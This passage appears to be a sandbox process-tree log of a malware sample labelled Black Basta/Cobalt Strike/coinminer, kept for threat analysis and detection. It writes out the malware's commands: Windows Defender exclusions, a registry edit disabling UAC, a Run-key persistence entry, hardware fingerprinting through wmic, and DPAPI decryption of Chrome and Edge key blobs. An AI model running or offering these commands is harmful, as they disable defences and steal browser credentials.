  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:5640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3464
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1252
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:4964
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:4956
    - - C:\Windows\Temp\{C603A0C5-FFDF-4909-B36F-08EF2C420746}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{C603A0C5-FFDF-4909-B36F-08EF2C420746}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=552 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:1856
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:4432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:6128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:5768
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1964 -ip 1964
1⤵
PID:6044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:744
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:4808
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041354.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:5096
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041354.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:3348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:4404
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:2884
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:6024
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\qmOKQbxWTz.ps1""
      4⤵
      PID:4032
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\qmOKQbxWTz.ps1"
        5⤵
        
        PID:4128
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3mkgo4pk\3mkgo4pk.cmdline"
        6⤵
        
        PID:5760
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5ABD.tmp" "c:\Users\Admin\AppData\Local\Temp\3mkgo4pk\CSC887A95ECA87C45989A3B8327A1CD42A.TMP"
        7⤵
        
        PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3656
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3104
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:6132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:2788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:4896
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5148
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:748
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:5932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.Mq3TwhfnG2""
      4⤵
      PID:3152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.Mq3TwhfnG2"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:3456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:2676
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:5940
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:4868
    - - C:\Windows\Temp\{080D9977-06A0-452A-B46B-145C69DF2AB7}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{080D9977-06A0-452A-B46B-145C69DF2AB7}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=700 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:4052
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:1376
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041358.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:1848
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041358.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:3872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:2164
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:4392
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:1740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\S9dbaGiGVZ.ps1""
      4⤵
      PID:5248
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\S9dbaGiGVZ.ps1"
        5⤵
        
        PID:4696
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\olp4e4dm\olp4e4dm.cmdline"
        6⤵
        
        PID:5604
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67AE.tmp" "c:\Users\Admin\AppData\Local\Temp\olp4e4dm\CSCBED59E01F0474E92893BF07D58DBADAE.TMP"
        7⤵
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5556
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5668
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4156
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:6104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:3044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:3000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:652
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:4912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:5840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.G3xmT7bB5H""
      4⤵
      PID:5760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.G3xmT7bB5H"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        
        PID:4928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3080
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3996
    - - C:\Windows\System32\Wbem\WMIC.exe
        
